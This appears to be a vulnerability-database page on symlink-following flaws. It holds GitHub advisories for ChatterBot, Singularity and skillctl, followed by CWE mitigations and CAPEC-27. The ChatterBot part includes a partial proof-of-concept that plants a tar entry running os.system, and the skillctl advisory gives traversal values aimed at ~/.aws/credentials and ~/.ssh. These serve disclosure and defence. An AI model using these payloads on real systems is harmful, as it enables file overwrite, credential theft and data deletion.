tarfile.open(str(tar_path), \"w:gz\") as tf:\n        info = tarfile.TarInfo(name=\"dialog_001.tsv\")\n        payload = b\"2024-01-01\\tuser1\\t0\\tARBITRARY_CONTENT_VIA_SYMLINK\\n\"\n        info.size = len(payload)\n        tf.addfile(info, io.BytesIO(payload))\n\n        info2 = tarfile.TarInfo(name=\"config.py\")\n        rce = b\"import os; os.system(\u0027id \u003e /tmp/chatterbot_rce\u0027)\\n\"\n        info2.size = len(rce)\n        tf.addfile(info2, io.BytesIO(rce))\n    if not os.path.exists(data_path):\n        os.makedirs(data_path)\n    def is_within_directory(directory, target):\n        abs_directory = os.path.abspath(directory)\n        abs_target = os.path.abspath(target)\n        prefix = os.path.commonprefix([abs_directory, abs_target])\n        return prefix == abs_directory\n\n    with tarfile.open(str(tar_path), \"r:gz\") as tar:\n        for member in tar.getmembers():\n            member_path = os.path.join(str(data_path), member.name)\n            if not is_within_directory(str(data_path), member_path):\n                raise Exception(\"Attempted Path Traversal in Tar File\")\n        tar.extractall(str(data_path))\n\n    print(f\"[3] extractall(data_path) \u2014 data_path is symlink, writes to target\")\n\n    # Verify\n    files = list(ATTACKER_TARGET.iterdir())\n    if files:\n        print(f\"\\n[+] EXPLOIT SUCCESSFUL \u2014 {len(files)} files in attacker directory:\")\n        for f in sorted(files):\n            print(f\"    {f.name}: {f.read_text().strip()[:60]}\")\n    else:\n        print(\"[-] Failed\")\n        shutil.rmtree(str(test_base), ignore_errors=True)\n        shutil.rmtree(str(ATTACKER_TARGET), ignore_errors=True)\n        sys.exit(1)\n\n    shutil.rmtree(str(test_base), ignore_errors=True)\n    shutil.rmtree(str(ATTACKER_TARGET), ignore_errors=True)\n    sys.exit(0)\n\n\nif __name__ == \"__main__\":\n    print(f\"chatterbot installed: {UbuntuCorpusTrainer.__module__}\")\n    print(f\"Attacker target: {ATTACKER_TARGET}\")\n    print()\n    main()\n\n```\n\n### PoC output \n\n\u003cimg width=\"1748\" height=\"336\" alt=\"image\" src=\"https://github.com/user-attachments/assets/55a3fee5-0d3b-46d7-8e79-75aad34b322c\" /\u003e\n\n## Suggested Fix\n\nRefuse symlinks on the output directory before extraction:\n\n```python\ndef extract(self, file_path: str):\n    if os.path.islink(self.data_path):\n        raise self.TrainerInitializationException(\n            f\u0027Refusing to extract to symlink: {self.data_path}\u0027)\n    if not os.path.exists(self.data_path):\n        os.makedirs(self.data_path)\n    ...\n```",
  "id": "GHSA-wvrh-2f4m-924v",
  "modified": "2026-06-19T22:08:08Z",
  "published": "2026-06-19T22:08:08Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/gunthercox/ChatterBot/security/advisories/GHSA-wvrh-2f4m-924v"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/gunthercox/ChatterBot"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "ChatterBot: Symlink-Following Arbitrary Write via UbuntuCorpusTrainer"
}

GHSA-WWRX-W7C9-RF87

Vulnerability from github – Published: 2025-12-02 21:07 – Updated: 2025-12-09 19:51
VLAI
Summary
Singluarity ineffectively applies selinux / apparmor LSM process labels
Details

Impact

Native Mode (default)

Singularity's default native runtime allows users to apply restrictions to container processes using the apparmor or selinux Linux Security Modules (LSMs), via the --security selinux:<label> or --security apparmor:<profile> flags.

LSM labels are written to process or thread attrs/exec under /proc. If a user relies on LSM restrictions to prevent malicious operations then, under certain circumstances, an attacker can redirect the LSM label write operation so that it is ineffective. This requires:

  • The attacker to cause the user to run a malicious container image that redirects the mount of /proc to the destination of a shared mount, either known to be configured on the target system, or that will be specified by the user when running the container.
  • Control of the content of the shared mount, for example through another malicious container which also binds it, or as a user with relevant permissions on the host system it is bound from.

Note that Singularity does not attempt to prevent damaging operations, or container escape, from containers that are started as the host root user. When a non-root user starts a container any LSM writes to /proc are performed as that user. For these reasons, the denial-of-service and container escape attacks detailed in runc CVE-2025-52881 are not relevant. Processes running in non-root containers are subject to the standard permissions for the non-root account used, and cannot escalate privilege, even when intended container-specific LSM labels are not correctly applied.

In addition, a bug in the detection of selinux support in Singularity's default setuid flow means that --security selinux:<label> flags may not be applied, even in the absence of an attack - but in this case a warning message is emitted, indicating that selinux is unavailable. This warning may be may be overlooked, mis-interpreted, or not seen when singularity is run from a script or other tool. Failure to apply requested restrictions should result in a fatal error, rather than a warning message.

OCI-Mode

Singularity's OCI-mode is unaffected as it does not currently support applying LSM restrictions via the --security flag.

Patches

Ineffective write of selinux process labels is addressed via an update to the containers/selinux dependency in https://github.com/sylabs/singularity/pull/3850. This update brings in the upstream fix for CVE-2025-52881 in this dependency.

Ineffective write of apparmor process labels is addressed in commit 5af3e79.

Failure to detect apparmor / selinux support, when --security flags are provided, is made an error rather than a warning in commit 2788296.

Workarounds

There are no known workarounds, other than to define system-wide apparmor / selinux policy for Singularity itself. This would apply to all containers, not just those run with the --security flags. Additionally, restrictions that are reasonable to apply to container processes may impact the functionality of Singularity.

References

Related vulnerabilities in runc:

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/sylabs/singularity/v4"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "4.2.0-rc.1"
            },
            {
              "fixed": "4.3.5"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/sylabs/singularity/v4"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "4.1.11"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-64750"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-61",
      "CWE-706"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-12-02T21:07:02Z",
    "nvd_published_at": "2025-12-02T18:15:48Z",
    "severity": "MODERATE"
  },
  "details": "### Impact\n\n_**Native Mode (default)**_\n\nSingularity\u0027s default native runtime allows users to apply restrictions to container processes using the apparmor or selinux Linux Security Modules (LSMs), via the `--security selinux:\u003clabel\u003e` or `--security apparmor:\u003cprofile\u003e` flags.\n\nLSM labels are written to process or thread `attrs/exec` under `/proc`. If a user relies on LSM restrictions to prevent malicious operations then, under certain circumstances, an attacker can redirect the LSM label write operation so that it is ineffective. This requires:\n\n* The attacker to cause the user to run a malicious container image that redirects the mount of `/proc` to the destination of a shared mount, either known to be configured on the target system, or that will be specified by the user when running the container.\n* Control of the content of the shared mount, for example through another malicious container which also binds it, or as a user with relevant permissions on the host system it is bound from.\n\nNote that Singularity does not attempt to prevent damaging operations, or container escape, from containers that are started as the host root user. When a non-root user starts a container any LSM writes to /proc are performed as that user. For these reasons, the denial-of-service and container escape attacks detailed in [runc CVE-2025-52881](https://github.com/opencontainers/runc/security/advisories/GHSA-cgrx-mc8f-2prm) are not relevant. Processes running in non-root containers are subject to the standard permissions for the non-root account used, and cannot escalate privilege, even when intended container-specific LSM labels are not correctly applied.\n\nIn addition, a bug in the detection of selinux support in Singularity\u0027s default setuid flow means that `--security selinux:\u003clabel\u003e` flags may not be applied, even in the absence of an attack  - but in this case a warning message is emitted, indicating that selinux is unavailable. This warning may be may be overlooked, mis-interpreted, or not seen when singularity is run from a script or other tool. Failure to apply requested restrictions should result in a fatal error, rather than a warning message.\n\n_**OCI-Mode**_\n\nSingularity\u0027s OCI-mode is unaffected as it does not currently support applying LSM restrictions via the `--security` flag.\n\n### Patches\n\nIneffective write of selinux process labels is addressed via an update to the containers/selinux dependency in https://github.com/sylabs/singularity/pull/3850. This update brings in the upstream fix for CVE-2025-52881 in this dependency.\n\nIneffective write of apparmor process labels is addressed in commit 5af3e79.\n\nFailure to detect apparmor / selinux support, when `--security` flags are provided, is made an error rather than a warning in commit 2788296.\n\n### Workarounds\n\nThere are no known workarounds, other than to define system-wide apparmor / selinux policy for Singularity itself. This would apply to all containers, not just those run with the `--security` flags. Additionally, restrictions that are reasonable to apply to container processes may impact the functionality of Singularity.\n\n### References\n\nRelated vulnerabilities in runc:\n\n* [runc CVE-2025-52881](https://github.com/opencontainers/runc/security/advisories/GHSA-cgrx-mc8f-2prm)\n* [runc CVE-2019-19921](https://github.com/advisories/GHSA-fh74-hm69-rqjw)",
  "id": "GHSA-wwrx-w7c9-rf87",
  "modified": "2025-12-09T19:51:27Z",
  "published": "2025-12-02T21:07:02Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/opencontainers/runc/security/advisories/GHSA-cgrx-mc8f-2prm"
    },
    {
      "type": "WEB",
      "url": "https://github.com/sylabs/singularity/security/advisories/GHSA-wwrx-w7c9-rf87"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-64750"
    },
    {
      "type": "WEB",
      "url": "https://github.com/sylabs/singularity/pull/3850"
    },
    {
      "type": "WEB",
      "url": "https://github.com/sylabs/singularity/commit/27882963879a7af1699fd6511c3f5f1371d80f33"
    },
    {
      "type": "WEB",
      "url": "https://github.com/sylabs/singularity/commit/5af3e790c40593591dfc26d0692e4d4b21c29ba0"
    },
    {
      "type": "ADVISORY",
      "url": "https://github.com/advisories/GHSA-fh74-hm69-rqjw"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/sylabs/singularity"
    },
    {
      "type": "WEB",
      "url": "https://pkg.go.dev/vuln/GO-2025-4177"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Singluarity ineffectively applies selinux / apparmor LSM process labels"
}

GHSA-WX3M-WHQV-XV47

Vulnerability from github – Published: 2026-06-05 19:43 – Updated: 2026-06-05 19:46
VLAI
Summary
skillctl: Path traversal and symlink-follow in skillctl allow arbitrary file disclosure and deletion
Details

Impact

skillctl 0.1.0 and 0.1.1 contained four path-safety vulnerabilities that, in combination, allowed an attacker to:

  1. Exfiltrate arbitrary files on the operator's machine by publishing a malicious skills library containing a symlink inside a skill folder (e.g. niania → /home/user/.aws/credentials). The symlink fell through entry.file_type().is_dir() in fs_util::copy_dir_all, was dereferenced by fs::copy, and the target's content was copied into the project. A subsequent skillctl push would have published the secret to the (possibly public) library — what the reporter called "round-trip path exfiltration".

  2. Delete arbitrary directories outside the project or library root by crafting a .skills.toml with a malicious destination or source_path field. Both were deserialized as PathBuf with zero validation. Because Path::join lets an absolute right-hand side replace the base, destination = "/home/user/.ssh" made cwd.join(...) resolve outside the project; .. traversal was equally unguarded. Downstream remove_dir_all in replace_folder_contents then wiped arbitrary writable directories on skillctl pull / push / detect. .skills.toml is the exact kind of file teams commit and exchange via PR; a single merged malicious PR was sufficient to weaponise the maintainer's next skillctl pull --all.

  3. detect --target accepted .. traversal, even though absolute paths were rejected. --target ../../../etc would have written outside the library root.

  4. Fork-name validation accepted . and .. literally, so a fork named .. would have produced a Path::join resolving to the parent directory and fs::rename could have clobbered it.

Patches

Fixed in v0.1.2:

  • Symlinks inside skill folders are hard-rejected at copy time (both top-level source and any descendant entry).
  • .skills.toml destination and source_path are validated at load time and reject absolute paths, .. components, and Windows-prefix components.
  • A new path_safety::safe_join helper is wired (defense-in-depth) at every destructive call site in pull.rs / push.rs.
  • detect --target and the interactive custom-path prompt go through the same validate_relative_subpath helper.
  • validate_fork_name explicitly rejects . and ...

Threat-model note: the fix is purely lexical (component-level) plus an explicit symlink check at copy time. No filesystem canonicalize calls were added, avoiding TOCTOU windows.

Credit

Reported privately on 2026-05-19 by firebaguette via the Umanio Discord (the reporter declined GitHub credit, so this advisory carries no structured credits field).

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "crates.io",
        "name": "skillctl"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.1.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-22",
      "CWE-61"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-06-05T19:43:51Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "## Impact\n\n`skillctl` 0.1.0 and 0.1.1 contained four path-safety vulnerabilities that, in combination, allowed an attacker to:\n\n1. **Exfiltrate arbitrary files on the operator\u0027s machine** by publishing a malicious skills library containing a symlink inside a skill folder (e.g. `niania \u2192 /home/user/.aws/credentials`). The symlink fell through `entry.file_type().is_dir()` in `fs_util::copy_dir_all`, was dereferenced by `fs::copy`, and the target\u0027s content was copied into the project. A subsequent `skillctl push` would have published the secret to the (possibly public) library \u2014 what the reporter called \"round-trip path exfiltration\".\n\n2. **Delete arbitrary directories outside the project or library root** by crafting a `.skills.toml` with a malicious `destination` or `source_path` field. Both were deserialized as `PathBuf` with zero validation. Because `Path::join` lets an absolute right-hand side replace the base, `destination = \"/home/user/.ssh\"` made `cwd.join(...)` resolve outside the project; `..` traversal was equally unguarded. Downstream `remove_dir_all` in `replace_folder_contents` then wiped arbitrary writable directories on `skillctl pull` / `push` / `detect`. `.skills.toml` is the exact kind of file teams commit and exchange via PR; a single merged malicious PR was sufficient to weaponise the maintainer\u0027s next `skillctl pull --all`.\n\n3. **`detect --target` accepted `..` traversal**, even though absolute paths were rejected. `--target ../../../etc` would have written outside the library root.\n\n4. **Fork-name validation accepted `.` and `..` literally**, so a fork named `..` would have produced a `Path::join` resolving to the parent directory and `fs::rename` could have clobbered it.\n\n## Patches\n\nFixed in [v0.1.2](https://github.com/umanio-agency/skillctl/releases/tag/v0.1.2):\n\n- Symlinks inside skill folders are hard-rejected at copy time (both top-level source and any descendant entry).\n- `.skills.toml` `destination` and `source_path` are validated at load time and reject absolute paths, `..` components, and Windows-prefix components.\n- A new `path_safety::safe_join` helper is wired (defense-in-depth) at every destructive call site in `pull.rs` / `push.rs`.\n- `detect --target` and the interactive custom-path prompt go through the same `validate_relative_subpath` helper.\n- `validate_fork_name` explicitly rejects `.` and `..`.\n\nThreat-model note: the fix is purely lexical (component-level) plus an explicit symlink check at copy time. No filesystem `canonicalize` calls were added, avoiding TOCTOU windows.\n\n## Credit\n\nReported privately on 2026-05-19 by **firebaguette** via the Umanio Discord (the reporter declined GitHub credit, so this advisory carries no structured credits field).",
  "id": "GHSA-wx3m-whqv-xv47",
  "modified": "2026-06-05T19:46:18Z",
  "published": "2026-06-05T19:43:51Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/umanio-agency/skillctl/security/advisories/GHSA-wx3m-whqv-xv47"
    },
    {
      "type": "WEB",
      "url": "https://github.com/umanio-agency/skillctl/commit/827fff5c0698dd9e48e777d5907cf7bc19b91aca"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/umanio-agency/skillctl"
    },
    {
      "type": "WEB",
      "url": "https://github.com/umanio-agency/skillctl/releases/tag/v0.1.2"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:L/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "skillctl: Path traversal and symlink-follow in skillctl allow arbitrary file disclosure and deletion"
}

Mitigation
Implementation

Symbolic link attacks often occur when a program creates a tmp directory that stores files/links. Access to the directory should be restricted to the program as to prevent attackers from manipulating the files.

Mitigation MIT-48.1
Architecture and Design

Strategy: Separation of Privilege

  • Follow the principle of least privilege when assigning access rights to entities in a software system.
  • Denying access to a file can prevent an attacker from replacing that file with a link to a sensitive file. Ensure good compartmentalization in the system to provide protected areas that can be trusted.
CAPEC-27: Leveraging Race Conditions via Symbolic Links

This attack leverages the use of symbolic links (Symlinks) in order to write to sensitive files. An attacker can create a Symlink link to a target file not otherwise accessible to them. When the privileged program tries to create a temporary file with the same name as the Symlink link, it will actually write to the target file pointed to by the attackers' Symlink link. If the attacker can insert malicious content in the temporary file they will be writing to the sensitive file by using the Symlink. The race occurs because the system checks if the temporary file exists, then creates the file. The attacker would typically create the Symlink during the interval between the check and the creation of the temporary file.